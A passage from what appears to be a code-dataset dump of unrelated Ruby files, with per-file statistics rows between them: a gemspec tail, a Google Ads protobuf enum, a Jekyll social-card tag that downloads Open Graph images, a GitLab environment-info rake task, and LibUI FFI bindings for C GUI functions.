s.summary = "Provides three abilities to delegate method calls to an object.".freeze
end
| 44.130435 | 156 | 0.695567 |
33316b92297db5fa47bfe8a5b7cd15e965f38a9e | 119 | require 'pry'
require_relative '../config/environment'
require_relative 'methods.rb'
require 'io/console'
first_prompt | 19.833333 | 40 | 0.806723 |
79f72b820a658eb91b32c9edcbae60ce17bab0bd | 1,050 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads/v5/errors/time_zone_error.proto
require 'google/protobuf'
require 'google/api/annotations_pb'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/ads/googleads/v5/errors/time_zone_error.proto", :syntax => :proto3) do
add_message "google.ads.googleads.v5.errors.TimeZoneErrorEnum" do
end
add_enum "google.ads.googleads.v5.errors.TimeZoneErrorEnum.TimeZoneError" do
value :UNSPECIFIED, 0
value :UNKNOWN, 1
value :INVALID_TIME_ZONE, 5
end
end
end
module Google
module Ads
module GoogleAds
module V5
module Errors
TimeZoneErrorEnum = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v5.errors.TimeZoneErrorEnum").msgclass
TimeZoneErrorEnum::TimeZoneError = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v5.errors.TimeZoneErrorEnum.TimeZoneError").enummodule
end
end
end
end
end
| 33.870968 | 178 | 0.745714 |
5daebbcf6fcdeda8565a1315527f1bd1db2ddde4 | 2,420 | require 'metainspector'
require 'open-uri'
require 'mini_magick'
module Jekyll
class SocialCardTag < Liquid::Tag
def initialize(tag_name, text, options)
super
@card_url = text
end
def render(context)
site = context.registers[:site]
baseurl = site.baseurl
@@properties ||= {}
@@properties[@card_url] ||= get_properties(@card_url)
properties = @@properties[@card_url]
title = properties['og:title'].first
if title.split.last == 'Blog'
long_title_length = title.split.length-4
title = title.split[0..long_title_length].join(" ")
if title.length > 84
title = title[0..84] + "..."
end
end
image_url = properties['og:image'].first
published_at = properties['article:published_time'].first
published_at = Date.parse(published_at).strftime('%B %d, %Y')
# We need to download the image, so we can serve it directly
# to avoid mixed-mode SSL warnings. Also, cache it for jekyll perf
filename = "#{File.basename(image_url, File.extname(image_url))}.jpg"
image_dir = "images/blog"
image_path = "#{image_dir}/#{filename}"
output_dir = "_tmp/#{image_dir}"
output_path = "#{output_dir}/#{filename}"
unless File.exist?(output_path)
FileUtils.mkdir_p(output_dir) unless Dir.exist?(output_dir)
download_file(image_url, output_path)
end
site.static_files << Jekyll::StaticFile.new(site, '_tmp', image_dir, filename)
<<-HEREDOC
<div class="col-xs-6 col-sm-6 col-md-4" style="text-decoration: none!important;">
<a href="#{@card_url}" title="#{title}" class="post-teaser lang-tile lang-tile-large" style="text-decoration: none!important;">
<div style="min-height:60%"><img class="larger_icon" src="#{baseurl}/#{image_path}" alt="icon" itemprop="image"></div>
<p itemprop="name" class="lg text-primary">#{title}</p>
</a>
</div>
HEREDOC
end
def get_properties(url)
page = MetaInspector.new(url)
page.meta_tags['property']
end
def download_file(url, path)
stream = open(url.sub(/^\/\//, 'https://'))
image = MiniMagick::Image.read(stream)
image.format "jpg"
image.resize "768x768>"
image.write path
end
end
end
Liquid::Template.register_tag('socialcard', Jekyll::SocialCardTag)
| 32.266667 | 135 | 0.624793 |
f7c831892ee28e89eb51ffcc9c37450c5559640e | 3,261 | namespace :gitlab do
namespace :env do
desc "GitLab | Show information about GitLab and its environment"
task info: :environment do
# check if there is an RVM environment
rvm_version = run_and_match(%W(rvm --version), /[\d\.]+/).try(:to_s)
# check Ruby version
ruby_version = run_and_match(%W(ruby --version), /[\d\.p]+/).try(:to_s)
# check Gem version
gem_version = run_command(%W(gem --version))
# check Bundler version
bunder_version = run_and_match(%W(bundle --version), /[\d\.]+/).try(:to_s)
# check Rake version
rake_version = run_and_match(%W(rake --version), /[\d\.]+/).try(:to_s)
# check redis version
redis_version = run_and_match(%W(redis-cli --version), /redis-cli (\d+\.\d+\.\d+)/).to_a
puts ""
puts "System information".color(:yellow)
puts "System:\t\t#{os_name || "unknown".color(:red)}"
puts "Current User:\t#{run_command(%W(whoami))}"
puts "Using RVM:\t#{rvm_version.present? ? "yes".color(:green) : "no"}"
puts "RVM Version:\t#{rvm_version}" if rvm_version.present?
puts "Ruby Version:\t#{ruby_version || "unknown".color(:red)}"
puts "Gem Version:\t#{gem_version || "unknown".color(:red)}"
puts "Bundler Version:#{bunder_version || "unknown".color(:red)}"
puts "Rake Version:\t#{rake_version || "unknown".color(:red)}"
puts "Redis Version:\t#{redis_version[1] || "unknown".color(:red)}"
puts "Sidekiq Version:#{Sidekiq::VERSION}"
# check database adapter
database_adapter = ActiveRecord::Base.connection.adapter_name.downcase
project = Group.new(path: "some-group").projects.build(path: "some-project")
# construct clone URLs
http_clone_url = project.http_url_to_repo
ssh_clone_url = project.ssh_url_to_repo
omniauth_providers = Gitlab.config.omniauth.providers
omniauth_providers.map! { |provider| provider['name'] }
puts ""
puts "GitLab information".color(:yellow)
puts "Version:\t#{Gitlab::VERSION}"
puts "Revision:\t#{Gitlab::REVISION}"
puts "Directory:\t#{Rails.root}"
puts "DB Adapter:\t#{database_adapter}"
puts "URL:\t\t#{Gitlab.config.gitlab.url}"
puts "HTTP Clone URL:\t#{http_clone_url}"
puts "SSH Clone URL:\t#{ssh_clone_url}"
puts "Using LDAP:\t#{Gitlab.config.ldap.enabled ? "yes".color(:green) : "no"}"
puts "Using Omniauth:\t#{Gitlab.config.omniauth.enabled ? "yes".color(:green) : "no"}"
puts "Omniauth Providers: #{omniauth_providers.join(', ')}" if Gitlab.config.omniauth.enabled
# check Gitolite version
gitlab_shell_version_file = "#{Gitlab.config.gitlab_shell.hooks_path}/../VERSION"
if File.readable?(gitlab_shell_version_file)
gitlab_shell_version = File.read(gitlab_shell_version_file)
end
puts ""
puts "GitLab Shell".color(:yellow)
puts "Version:\t#{gitlab_shell_version || "unknown".color(:red)}"
puts "Repository storage paths:"
Gitlab.config.repositories.storages.each do |name, path|
puts "- #{name}: \t#{path}"
end
puts "Hooks:\t\t#{Gitlab.config.gitlab_shell.hooks_path}"
puts "Git:\t\t#{Gitlab.config.git.bin_path}"
end
end
end
| 41.807692 | 99 | 0.644588 |
396dfd50646289d7fa08825f5be07bce0a6832ae | 25,897 | require 'fiddle/import'
require_relative 'fiddle_patch'
module LibUI
module FFI
extend Fiddle::Importer
extend FiddlePatch
begin
dlload LibUI.ffi_lib
rescue LoadError
raise LoadError, 'Could not find libui shared library'
end
class << self
attr_reader :func_map
def try_extern(signature, *opts)
extern(signature, *opts)
rescue StandardError => e
warn "#{e.class.name}: #{e.message}"
end
def ffi_methods
@ffi_methods ||= func_map.each_key.to_a
end
end
typealias('uint32_t', 'unsigned int')
InitOptions = struct [
'size_t Size'
]
# https://github.com/andlabs/libui/blob/master/ui.h
# keep same order
try_extern 'const char *uiInit(uiInitOptions *options)'
try_extern 'void uiUninit(void)'
try_extern 'void uiFreeInitError(const char *err)'
try_extern 'void uiMain(void)'
try_extern 'void uiMainSteps(void)'
try_extern 'int uiMainStep(int wait)'
try_extern 'void uiQuit(void)'
try_extern 'void uiQueueMain(void (*f)(void *data), void *data)'
try_extern 'void uiTimer(int milliseconds, int (*f)(void *data), void *data)'
try_extern 'void uiOnShouldQuit(int (*f)(void *data), void *data)'
try_extern 'void uiFreeText(char *text)'
Control = struct [
'uint32_t Signature',
'uint32_t OSSignature',
'uint32_t TypeSignature',
'void (*Destroy)(uiControl *)',
'uintptr_t (*Handle)(uiControl *)',
'uiControl *(*Parent)(uiControl *)',
'void (*SetParent)(uiControl *, uiControl *)',
'int (*Toplevel)(uiControl *)',
'int (*Visible)(uiControl *)',
'void (*Show)(uiControl *)',
'void (*Hide)(uiControl *)',
'int (*Enabled)(uiControl *)',
'void (*Enable)(uiControl *)',
'void (*Disable)(uiControl *)'
]
try_extern 'void uiControlDestroy(uiControl *)'
try_extern 'uintptr_t uiControlHandle(uiControl *)'
try_extern 'uiControl *uiControlParent(uiControl *)'
try_extern 'void uiControlSetParent(uiControl *, uiControl *)'
try_extern 'int uiControlToplevel(uiControl *)'
try_extern 'int uiControlVisible(uiControl *)'
try_extern 'void uiControlShow(uiControl *)'
try_extern 'void uiControlHide(uiControl *)'
try_extern 'int uiControlEnabled(uiControl *)'
try_extern 'void uiControlEnable(uiControl *)'
try_extern 'void uiControlDisable(uiControl *)'
try_extern 'uiControl *uiAllocControl(size_t n, uint32_t OSsig, uint32_t typesig, const char *typenamestr)'
try_extern 'void uiFreeControl(uiControl *)'
try_extern 'void uiControlVerifySetParent(uiControl *, uiControl *)'
try_extern 'int uiControlEnabledToUser(uiControl *)'
try_extern 'void uiUserBugCannotSetParentOnToplevel(const char *type)'
# uiWindow
try_extern 'char *uiWindowTitle(uiWindow *w)'
try_extern 'void uiWindowSetTitle(uiWindow *w, const char *title)'
try_extern 'void uiWindowContentSize(uiWindow *w, int *width, int *height)'
try_extern 'void uiWindowSetContentSize(uiWindow *w, int width, int height)'
try_extern 'int uiWindowFullscreen(uiWindow *w)'
try_extern 'void uiWindowSetFullscreen(uiWindow *w, int fullscreen)'
try_extern 'void uiWindowOnContentSizeChanged(uiWindow *w, void (*f)(uiWindow *, void *), void *data)'
try_extern 'void uiWindowOnClosing(uiWindow *w, int (*f)(uiWindow *w, void *data), void *data)'
try_extern 'int uiWindowBorderless(uiWindow *w)'
try_extern 'void uiWindowSetBorderless(uiWindow *w, int borderless)'
try_extern 'void uiWindowSetChild(uiWindow *w, uiControl *child)'
try_extern 'int uiWindowMargined(uiWindow *w)'
try_extern 'void uiWindowSetMargined(uiWindow *w, int margined)'
try_extern 'uiWindow *uiNewWindow(const char *title, int width, int height, int hasMenubar)'
# uiButton
try_extern 'char *uiButtonText(uiButton *b)'
try_extern 'void uiButtonSetText(uiButton *b, const char *text)'
try_extern 'void uiButtonOnClicked(uiButton *b, void (*f)(uiButton *b, void *data), void *data)'
try_extern 'uiButton *uiNewButton(const char *text)'
# uiBox
try_extern 'void uiBoxAppend(uiBox *b, uiControl *child, int stretchy)'
try_extern 'void uiBoxDelete(uiBox *b, int index)'
try_extern 'int uiBoxPadded(uiBox *b)'
try_extern 'void uiBoxSetPadded(uiBox *b, int padded)'
try_extern 'uiBox *uiNewHorizontalBox(void)'
try_extern 'uiBox *uiNewVerticalBox(void)'
# uiCheckbox
try_extern 'char *uiCheckboxText(uiCheckbox *c)'
try_extern 'void uiCheckboxSetText(uiCheckbox *c, const char *text)'
try_extern 'void uiCheckboxOnToggled(uiCheckbox *c, void (*f)(uiCheckbox *c, void *data), void *data)'
try_extern 'int uiCheckboxChecked(uiCheckbox *c)'
try_extern 'void uiCheckboxSetChecked(uiCheckbox *c, int checked)'
try_extern 'uiCheckbox *uiNewCheckbox(const char *text)'
# uiEntry
try_extern 'char *uiEntryText(uiEntry *e)'
try_extern 'void uiEntrySetText(uiEntry *e, const char *text)'
try_extern 'void uiEntryOnChanged(uiEntry *e, void (*f)(uiEntry *e, void *data), void *data)'
try_extern 'int uiEntryReadOnly(uiEntry *e)'
try_extern 'void uiEntrySetReadOnly(uiEntry *e, int readonly)'
try_extern 'uiEntry *uiNewEntry(void)'
try_extern 'uiEntry *uiNewPasswordEntry(void)'
try_extern 'uiEntry *uiNewSearchEntry(void)'
# uiLabel
try_extern 'char *uiLabelText(uiLabel *l)'
try_extern 'void uiLabelSetText(uiLabel *l, const char *text)'
try_extern 'uiLabel *uiNewLabel(const char *text)'
# uiTab
try_extern 'void uiTabAppend(uiTab *t, const char *name, uiControl *c)'
try_extern 'void uiTabInsertAt(uiTab *t, const char *name, int before, uiControl *c)'
try_extern 'void uiTabDelete(uiTab *t, int index)'
try_extern 'int uiTabNumPages(uiTab *t)'
try_extern 'int uiTabMargined(uiTab *t, int page)'
try_extern 'void uiTabSetMargined(uiTab *t, int page, int margined)'
try_extern 'uiTab *uiNewTab(void)'
# uiGroup
try_extern 'char *uiGroupTitle(uiGroup *g)'
try_extern 'void uiGroupSetTitle(uiGroup *g, const char *title)'
try_extern 'void uiGroupSetChild(uiGroup *g, uiControl *c)'
try_extern 'int uiGroupMargined(uiGroup *g)'
try_extern 'void uiGroupSetMargined(uiGroup *g, int margined)'
try_extern 'uiGroup *uiNewGroup(const char *title)'
# uiSpinbox
try_extern 'int uiSpinboxValue(uiSpinbox *s)'
try_extern 'void uiSpinboxSetValue(uiSpinbox *s, int value)'
try_extern 'void uiSpinboxOnChanged(uiSpinbox *s, void (*f)(uiSpinbox *s, void *data), void *data)'
try_extern 'uiSpinbox *uiNewSpinbox(int min, int max)'
# uiSlider
try_extern 'int uiSliderValue(uiSlider *s)'
try_extern 'void uiSliderSetValue(uiSlider *s, int value)'
try_extern 'void uiSliderOnChanged(uiSlider *s, void (*f)(uiSlider *s, void *data), void *data)'
try_extern 'uiSlider *uiNewSlider(int min, int max)'
# uiProgressBar
try_extern 'int uiProgressBarValue(uiProgressBar *p)'
try_extern 'void uiProgressBarSetValue(uiProgressBar *p, int n)'
try_extern 'uiProgressBar *uiNewProgressBar(void)'
# uiSeparator
try_extern 'uiSeparator *uiNewHorizontalSeparator(void)'
try_extern 'uiSeparator *uiNewVerticalSeparator(void)'
# uiCombobox
try_extern 'void uiComboboxAppend(uiCombobox *c, const char *text)'
try_extern 'int uiComboboxSelected(uiCombobox *c)'
try_extern 'void uiComboboxSetSelected(uiCombobox *c, int n)'
try_extern 'void uiComboboxOnSelected(uiCombobox *c, void (*f)(uiCombobox *c, void *data), void *data)'
try_extern 'uiCombobox *uiNewCombobox(void)'
# uiEditableCombobox
try_extern 'void uiEditableComboboxAppend(uiEditableCombobox *c, const char *text)'
try_extern 'char *uiEditableComboboxText(uiEditableCombobox *c)'
try_extern 'void uiEditableComboboxSetText(uiEditableCombobox *c, const char *text)'
try_extern 'void uiEditableComboboxOnChanged(uiEditableCombobox *c, void (*f)(uiEditableCombobox *c, void *data), void *data)'
try_extern 'uiEditableCombobox *uiNewEditableCombobox(void)'
# uiRadioButtons
try_extern 'void uiRadioButtonsAppend(uiRadioButtons *r, const char *text)'
try_extern 'int uiRadioButtonsSelected(uiRadioButtons *r)'
try_extern 'void uiRadioButtonsSetSelected(uiRadioButtons *r, int n)'
try_extern 'void uiRadioButtonsOnSelected(uiRadioButtons *r, void (*f)(uiRadioButtons *, void *), void *data)'
try_extern 'uiRadioButtons *uiNewRadioButtons(void)'
# uiDateTimePicker
# time.h
TM = if Fiddle::WINDOWS
struct [
'int tm_sec',
'int tm_min',
'int tm_hour',
'int tm_mday',
'int tm_mon',
'int tm_year',
'int tm_wday',
'int tm_yday',
'int tm_isdst'
]
else # The GNU C Library (glibc)
struct [
'int tm_sec',
'int tm_min',
'int tm_hour',
'int tm_mday',
'int tm_mon',
'int tm_year',
'int tm_wday',
'int tm_yday',
'int tm_isdst',
'long tm_gmtoff',
'const char *tm_zone'
]
end
try_extern 'void uiDateTimePickerTime(uiDateTimePicker *d, struct tm *time)'
try_extern 'void uiDateTimePickerSetTime(uiDateTimePicker *d, const struct tm *time)'
try_extern 'void uiDateTimePickerOnChanged(uiDateTimePicker *d, void (*f)(uiDateTimePicker *, void *), void *data)'
try_extern 'uiDateTimePicker *uiNewDateTimePicker(void)'
try_extern 'uiDateTimePicker *uiNewDatePicker(void)'
try_extern 'uiDateTimePicker *uiNewTimePicker(void)'
# uiMultilineEntry
try_extern 'char *uiMultilineEntryText(uiMultilineEntry *e)'
try_extern 'void uiMultilineEntrySetText(uiMultilineEntry *e, const char *text)'
try_extern 'void uiMultilineEntryAppend(uiMultilineEntry *e, const char *text)'
try_extern 'void uiMultilineEntryOnChanged(uiMultilineEntry *e, void (*f)(uiMultilineEntry *e, void *data), void *data)'
try_extern 'int uiMultilineEntryReadOnly(uiMultilineEntry *e)'
try_extern 'void uiMultilineEntrySetReadOnly(uiMultilineEntry *e, int readonly)'
try_extern 'uiMultilineEntry *uiNewMultilineEntry(void)'
try_extern 'uiMultilineEntry *uiNewNonWrappingMultilineEntry(void)'
# uiMenuItem
try_extern 'void uiMenuItemEnable(uiMenuItem *m)'
try_extern 'void uiMenuItemDisable(uiMenuItem *m)'
try_extern 'void uiMenuItemOnClicked(uiMenuItem *m, void (*f)(uiMenuItem *sender, uiWindow *window, void *data), void *data)'
try_extern 'int uiMenuItemChecked(uiMenuItem *m)'
try_extern 'void uiMenuItemSetChecked(uiMenuItem *m, int checked)'
# uiMenu
try_extern 'uiMenuItem *uiMenuAppendItem(uiMenu *m, const char *name)'
try_extern 'uiMenuItem *uiMenuAppendCheckItem(uiMenu *m, const char *name)'
try_extern 'uiMenuItem *uiMenuAppendQuitItem(uiMenu *m)'
try_extern 'uiMenuItem *uiMenuAppendPreferencesItem(uiMenu *m)'
try_extern 'uiMenuItem *uiMenuAppendAboutItem(uiMenu *m)'
try_extern 'void uiMenuAppendSeparator(uiMenu *m)'
try_extern 'uiMenu *uiNewMenu(const char *name)'
try_extern 'char *uiOpenFile(uiWindow *parent)'
try_extern 'char *uiSaveFile(uiWindow *parent)'
try_extern 'void uiMsgBox(uiWindow *parent, const char *title, const char *description)'
try_extern 'void uiMsgBoxError(uiWindow *parent, const char *title, const char *description)'
# uiArea
AreaHandler = struct [
'void (*Draw)(uiAreaHandler *, uiArea *, uiAreaDrawParams *)',
'void (*MouseEvent)(uiAreaHandler *, uiArea *, uiAreaMouseEvent *)',
'void (*MouseCrossed)(uiAreaHandler *, uiArea *, int left)',
'void (*DragBroken)(uiAreaHandler *, uiArea *)',
'int (*KeyEvent)(uiAreaHandler *, uiArea *, uiAreaKeyEvent *)'
]
typealias 'uiWindowResizeEdge', 'int'
try_extern 'void uiAreaSetSize(uiArea *a, int width, int height)'
try_extern 'void uiAreaQueueRedrawAll(uiArea *a)'
try_extern 'void uiAreaScrollTo(uiArea *a, double x, double y, double width, double height)'
try_extern 'void uiAreaBeginUserWindowMove(uiArea *a)'
try_extern 'void uiAreaBeginUserWindowResize(uiArea *a, uiWindowResizeEdge edge)'
try_extern 'uiArea *uiNewArea(uiAreaHandler *ah)'
try_extern 'uiArea *uiNewScrollingArea(uiAreaHandler *ah, int width, int height)'
AreaDrawParams = struct [
'uiDrawContext *Context',
'double AreaWidth',
'double AreaHeight',
'double ClipX',
'double ClipY',
'double ClipWidth',
'double ClipHeight'
]
typealias 'uiDrawBrushType', 'int'
typealias 'uiDrawLineCap', 'int'
typealias 'uiDrawLineJoin', 'int'
typealias 'uiDrawFillMode', 'int'
DrawMatrix = struct [
'double M11',
'double M12',
'double M21',
'double M22',
'double M31',
'double M32'
]
DrawBrush = struct [
'uiDrawBrushType Type',
'double R',
'double G',
'double B',
'double A',
'double X0',
'double Y0',
'double X1',
'double Y1',
'double OuterRadius',
'uiDrawBrushGradientStop *Stops',
'size_t NumStops'
]
DrawBrushGradientStop = struct [
'double Pos',
'double R',
'double G',
'double B',
'double A'
]
DrawStrokeParams = struct [
'uiDrawLineCap Cap',
'uiDrawLineJoin Join',
'double Thickness',
'double MiterLimit',
'double *Dashes',
'size_t NumDashes',
'double DashPhase'
]
# uiDrawPath
try_extern 'uiDrawPath *uiDrawNewPath(uiDrawFillMode fillMode)'
try_extern 'void uiDrawFreePath(uiDrawPath *p)'
try_extern 'void uiDrawPathNewFigure(uiDrawPath *p, double x, double y)'
try_extern 'void uiDrawPathNewFigureWithArc(uiDrawPath *p, double xCenter, double yCenter, double radius, double startAngle, double sweep, int negative)'
try_extern 'void uiDrawPathLineTo(uiDrawPath *p, double x, double y)'
try_extern 'void uiDrawPathArcTo(uiDrawPath *p, double xCenter, double yCenter, double radius, double startAngle, double sweep, int negative)'
try_extern 'void uiDrawPathBezierTo(uiDrawPath *p, double c1x, double c1y, double c2x, double c2y, double endX, double endY)'
try_extern 'void uiDrawPathCloseFigure(uiDrawPath *p)'
try_extern 'void uiDrawPathAddRectangle(uiDrawPath *p, double x, double y, double width, double height)'
try_extern 'void uiDrawPathEnd(uiDrawPath *p)'
try_extern 'void uiDrawStroke(uiDrawContext *c, uiDrawPath *path, uiDrawBrush *b, uiDrawStrokeParams *p)'
try_extern 'void uiDrawFill(uiDrawContext *c, uiDrawPath *path, uiDrawBrush *b)'
# uiDrawMatrix
try_extern 'void uiDrawMatrixSetIdentity(uiDrawMatrix *m)'
try_extern 'void uiDrawMatrixTranslate(uiDrawMatrix *m, double x, double y)'
try_extern 'void uiDrawMatrixScale(uiDrawMatrix *m, double xCenter, double yCenter, double x, double y)'
try_extern 'void uiDrawMatrixRotate(uiDrawMatrix *m, double x, double y, double amount)'
try_extern 'void uiDrawMatrixSkew(uiDrawMatrix *m, double x, double y, double xamount, double yamount)'
try_extern 'void uiDrawMatrixMultiply(uiDrawMatrix *dest, uiDrawMatrix *src)'
try_extern 'int uiDrawMatrixInvertible(uiDrawMatrix *m)'
try_extern 'int uiDrawMatrixInvert(uiDrawMatrix *m)'
try_extern 'void uiDrawMatrixTransformPoint(uiDrawMatrix *m, double *x, double *y)'
try_extern 'void uiDrawMatrixTransformSize(uiDrawMatrix *m, double *x, double *y)'
try_extern 'void uiDrawTransform(uiDrawContext *c, uiDrawMatrix *m)'
try_extern 'void uiDrawClip(uiDrawContext *c, uiDrawPath *path)'
try_extern 'void uiDrawSave(uiDrawContext *c)'
try_extern 'void uiDrawRestore(uiDrawContext *c)'
# uiAttribute
try_extern 'void uiFreeAttribute(uiAttribute *a)'
typealias 'uiAttributeType', 'int'
try_extern 'uiAttributeType uiAttributeGetType(const uiAttribute *a)'
try_extern 'uiAttribute *uiNewFamilyAttribute(const char *family)'
try_extern 'const char *uiAttributeFamily(const uiAttribute *a)'
try_extern 'uiAttribute *uiNewSizeAttribute(double size)'
try_extern 'double uiAttributeSize(const uiAttribute *a)'
typealias 'uiTextWeight', 'int'
try_extern 'uiAttribute *uiNewWeightAttribute(uiTextWeight weight)'
try_extern 'uiTextWeight uiAttributeWeight(const uiAttribute *a)'
typealias 'uiTextItalic', 'int'
try_extern 'uiAttribute *uiNewItalicAttribute(uiTextItalic italic)'
try_extern 'uiTextItalic uiAttributeItalic(const uiAttribute *a)'
typealias 'uiTextStretch', 'int'
try_extern 'uiAttribute *uiNewStretchAttribute(uiTextStretch stretch)'
try_extern 'uiTextStretch uiAttributeStretch(const uiAttribute *a)'
try_extern 'uiAttribute *uiNewColorAttribute(double r, double g, double b, double a)'
try_extern 'void uiAttributeColor(const uiAttribute *a, double *r, double *g, double *b, double *alpha)'
try_extern 'uiAttribute *uiNewBackgroundAttribute(double r, double g, double b, double a)'
typealias 'uiUnderline', 'int'
try_extern 'uiAttribute *uiNewUnderlineAttribute(uiUnderline u)'
try_extern 'uiUnderline uiAttributeUnderline(const uiAttribute *a)'
typealias 'uiUnderlineColor', 'int'
try_extern 'uiAttribute *uiNewUnderlineColorAttribute(uiUnderlineColor u, double r, double g, double b, double a)'
try_extern 'void uiAttributeUnderlineColor(const uiAttribute *a, uiUnderlineColor *u, double *r, double *g, double *b, double *alpha)'
# uiOpenTypeFeatures
typealias 'uiOpenTypeFeaturesForEachFunc', 'void*'
try_extern 'uiOpenTypeFeatures *uiNewOpenTypeFeatures(void)'
try_extern 'void uiFreeOpenTypeFeatures(uiOpenTypeFeatures *otf)'
try_extern 'uiOpenTypeFeatures *uiOpenTypeFeaturesClone(const uiOpenTypeFeatures *otf)'
try_extern 'void uiOpenTypeFeaturesAdd(uiOpenTypeFeatures *otf, char a, char b, char c, char d, uint32_t value)'
try_extern 'void uiOpenTypeFeaturesRemove(uiOpenTypeFeatures *otf, char a, char b, char c, char d)'
try_extern 'int uiOpenTypeFeaturesGet(const uiOpenTypeFeatures *otf, char a, char b, char c, char d, uint32_t *value)'
try_extern 'void uiOpenTypeFeaturesForEach(const uiOpenTypeFeatures *otf, uiOpenTypeFeaturesForEachFunc f, void *data)'
try_extern 'uiAttribute *uiNewFeaturesAttribute(const uiOpenTypeFeatures *otf)'
try_extern 'const uiOpenTypeFeatures *uiAttributeFeatures(const uiAttribute *a)'
# uiAttributedString
typealias 'uiAttributedStringForEachAttributeFunc', 'void*'
try_extern 'uiAttributedString *uiNewAttributedString(const char *initialString)'
try_extern 'void uiFreeAttributedString(uiAttributedString *s)'
try_extern 'const char *uiAttributedStringString(const uiAttributedString *s)'
try_extern 'size_t uiAttributedStringLen(const uiAttributedString *s)'
try_extern 'void uiAttributedStringAppendUnattributed(uiAttributedString *s, const char *str)'
try_extern 'void uiAttributedStringInsertAtUnattributed(uiAttributedString *s, const char *str, size_t at)'
try_extern 'void uiAttributedStringDelete(uiAttributedString *s, size_t start, size_t end)'
try_extern 'void uiAttributedStringSetAttribute(uiAttributedString *s, uiAttribute *a, size_t start, size_t end)'
try_extern 'void uiAttributedStringForEachAttribute(const uiAttributedString *s, uiAttributedStringForEachAttributeFunc f, void *data)'
try_extern 'size_t uiAttributedStringNumGraphemes(uiAttributedString *s)'
try_extern 'size_t uiAttributedStringByteIndexToGrapheme(uiAttributedString *s, size_t pos)'
try_extern 'size_t uiAttributedStringGraphemeToByteIndex(uiAttributedString *s, size_t pos)'
# uiFont
FontDescriptor = struct [
'char *Family',
'double Size',
'uiTextWeight Weight',
'uiTextItalic Italic',
'uiTextStretch Stretch'
]
typealias 'uiDrawTextAlign', 'int'
DrawTextLayoutParams = struct [
'uiAttributedString *String',
'uiFontDescriptor *DefaultFont',
'double Width',
'uiDrawTextAlign Align'
]
try_extern 'uiDrawTextLayout *uiDrawNewTextLayout(uiDrawTextLayoutParams *params)'
try_extern 'void uiDrawFreeTextLayout(uiDrawTextLayout *tl)'
try_extern 'void uiDrawText(uiDrawContext *c, uiDrawTextLayout *tl, double x, double y)'
try_extern 'void uiDrawTextLayoutExtents(uiDrawTextLayout *tl, double *width, double *height)'
# uiFontButton
try_extern 'void uiFontButtonFont(uiFontButton *b, uiFontDescriptor *desc)'
try_extern 'void uiFontButtonOnChanged(uiFontButton *b, void (*f)(uiFontButton *, void *), void *data)'
try_extern 'uiFontButton *uiNewFontButton(void)'
try_extern 'void uiFreeFontButtonFont(uiFontDescriptor *desc)'
typealias 'uiModifiers', 'int'
AreaMouseEvent = struct [
'double X',
'double Y',
'double AreaWidth',
'double AreaHeight',
'int Down',
'int Up',
'int Count',
'uiModifiers Modifiers',
'uint64_t Held1To64'
]
typealias 'uiExtKey', 'int'
AreaKeyEvent = struct [
'char Key',
'uiExtKey ExtKey',
'uiModifiers Modifier',
'uiModifiers Modifiers',
'int Up'
]
# uiColorButton
try_extern 'void uiColorButtonColor(uiColorButton *b, double *r, double *g, double *bl, double *a)'
try_extern 'void uiColorButtonSetColor(uiColorButton *b, double r, double g, double bl, double a)'
try_extern 'void uiColorButtonOnChanged(uiColorButton *b, void (*f)(uiColorButton *, void *), void *data)'
try_extern 'uiColorButton *uiNewColorButton(void)'
# uiForm
try_extern 'void uiFormAppend(uiForm *f, const char *label, uiControl *c, int stretchy)'
try_extern 'void uiFormDelete(uiForm *f, int index)'
try_extern 'int uiFormPadded(uiForm *f)'
try_extern 'void uiFormSetPadded(uiForm *f, int padded)'
try_extern 'uiForm *uiNewForm(void)'
typealias 'uiAlign', 'int'
typealias 'uiAt', 'int'
# uiGrid
try_extern 'void uiGridAppend(uiGrid *g, uiControl *c, int left, int top, int xspan, int yspan, int hexpand, uiAlign halign, int vexpand, uiAlign valign)'
try_extern 'void uiGridInsertAt(uiGrid *g, uiControl *c, uiControl *existing, uiAt at, int xspan, int yspan, int hexpand, uiAlign halign, int vexpand, uiAlign valign)'
try_extern 'int uiGridPadded(uiGrid *g)'
try_extern 'void uiGridSetPadded(uiGrid *g, int padded)'
try_extern 'uiGrid *uiNewGrid(void)'
# uiImage
try_extern 'uiImage *uiNewImage(double width, double height)'
try_extern 'void uiFreeImage(uiImage *i)'
try_extern 'void uiImageAppend(uiImage *i, void *pixels, int pixelWidth, int pixelHeight, int byteStride)'
# uiTable
try_extern 'void uiFreeTableValue(uiTableValue *v)'
typealias 'uiTableValueType', 'int'
try_extern 'uiTableValueType uiTableValueGetType(const uiTableValue *v)'
try_extern 'uiTableValue *uiNewTableValueString(const char *str)'
try_extern 'const char *uiTableValueString(const uiTableValue *v)'
try_extern 'uiTableValue *uiNewTableValueImage(uiImage *img)'
try_extern 'uiImage *uiTableValueImage(const uiTableValue *v)'
try_extern 'uiTableValue *uiNewTableValueInt(int i)'
try_extern 'int uiTableValueInt(const uiTableValue *v)'
try_extern 'uiTableValue *uiNewTableValueColor(double r, double g, double b, double a)'
try_extern 'void uiTableValueColor(const uiTableValue *v, double *r, double *g, double *b, double *a)'
TableModelHandler = struct [
'int (*NumColumns)(uiTableModelHandler *, uiTableModel *)',
'uiTableValueType (*ColumnType)(uiTableModelHandler *, uiTableModel *, int)',
'int (*NumRows)(uiTableModelHandler *, uiTableModel *)',
'uiTableValue *(*CellValue)(uiTableModelHandler *mh, uiTableModel *m, int row, int column)',
'void (*SetCellValue)(uiTableModelHandler *, uiTableModel *, int, int, const uiTableValue *)'
]
try_extern 'uiTableModel *uiNewTableModel(uiTableModelHandler *mh)'
try_extern 'void uiFreeTableModel(uiTableModel *m)'
try_extern 'void uiTableModelRowInserted(uiTableModel *m, int newIndex)'
try_extern 'void uiTableModelRowChanged(uiTableModel *m, int index)'
try_extern 'void uiTableModelRowDeleted(uiTableModel *m, int oldIndex)'
TableTextColumnOptionalParams = struct [
'int ColorModelColumn'
]
TableParams = struct [
'uiTableModel *Model',
'int RowBackgroundColorModelColumn'
]
try_extern 'void uiTableAppendTextColumn(uiTable *t, const char *name, int textModelColumn, int textEditableModelColumn, uiTableTextColumnOptionalParams *textParams)'
try_extern 'void uiTableAppendImageColumn(uiTable *t, const char *name, int imageModelColumn)'
